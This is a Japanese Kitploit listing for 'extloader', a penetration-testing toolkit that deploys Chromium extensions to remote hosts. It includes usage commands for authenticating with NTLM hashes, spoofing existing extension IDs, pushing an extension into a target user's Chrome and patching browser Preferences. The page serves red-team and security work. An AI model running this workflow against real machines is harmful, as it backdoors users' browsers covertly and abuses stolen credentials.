Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
extloader — Chromium拡張機能エクスプロイトツールキット | Kitploit
ツール/GitHubGitHub/synacktiv/extloader
永続化メカニズムエクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトペネトレーションテストレッドチーミング
GitHubsynacktiv/extloader

extloader

Chromium拡張機能エクスプロイトツールキット

リポジトリを見る
26210ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

extLoader

アンパックされた Chromium 拡張機能を管理・配備するための小さなツールキット。

詳細は以下のブログ記事を参照してください: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

インストール

直接インストール (pipx)

root@kitploit:~
pipx install .
extloader --help

Python 3.10+ を対象とした分離インストールには pipx を使用してください。

開発環境のセットアップ (uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

認証オプション

  • パスワード: -p/--password
  • ハッシュ: -H/--hash (LM:NT 形式または NT のみ)
  • ドメイン: -d/--domain (デフォルトは WORKGROUP)

共通パラメータ

  • -t, --target: ターゲットの IP/ホスト名
  • -u, --username: ユーザー名
  • -i, --index: check コマンドで取得したユーザーインデックス
  • --debug: デバッグログを有効化

使い方

以下は拡張機能を配備するステップバイステップの例です:

  1. まず、利用可能なターゲットを確認します:
root@kitploit:~
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local

┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
│   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘

別のマシンで exploit を実行する場合は、必ず事前に check コマンドを実行してコンテキスト (available_targets.json) を更新してください。

  1. マニフェストを準備します (署名または ID のなりすまし):
root@kitploit:~
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension

既存の拡張機能 ID になりすますには、上記のコマンドをスキップし、マニフェストの key に、模倣する拡張機能の base64 公開鍵を設定してください。その鍵を再利用すると CRX ID は変わりません。

  1. 拡張機能を配備します:
root@kitploit:~
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension

4.(代替) 手動配備用にパッケージ化:

root@kitploit:~
# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"

# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions

--prefs-file には、バックアップしたブラウザプロファイルのプリファレンスを指定します (Chrome/Edge は Secure Preferences として保存し、その他の Chromium ブラウザは Preferences を使用します)。ローダーはそれをコピーしてパッチを適用し、変更後と未変更の両方のバージョンをパッケージに含めます。

root@kitploit:~
├── extension/
│   └── chrome-mv3/
├── preferences/
│   ├── brave/
│   ├── chrome/
│   ├── chromium/
    [...]
└── info.json
  1. 必要に応じて元のプリファレンスを復元します:
root@kitploit:~
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences

TODO

  • Kerberos サポート
  • nxc モジュール
  • package ワークフローを Linux 向けに適合
  • package ワークフローを macOS 向けに適合
ツールをダウンロード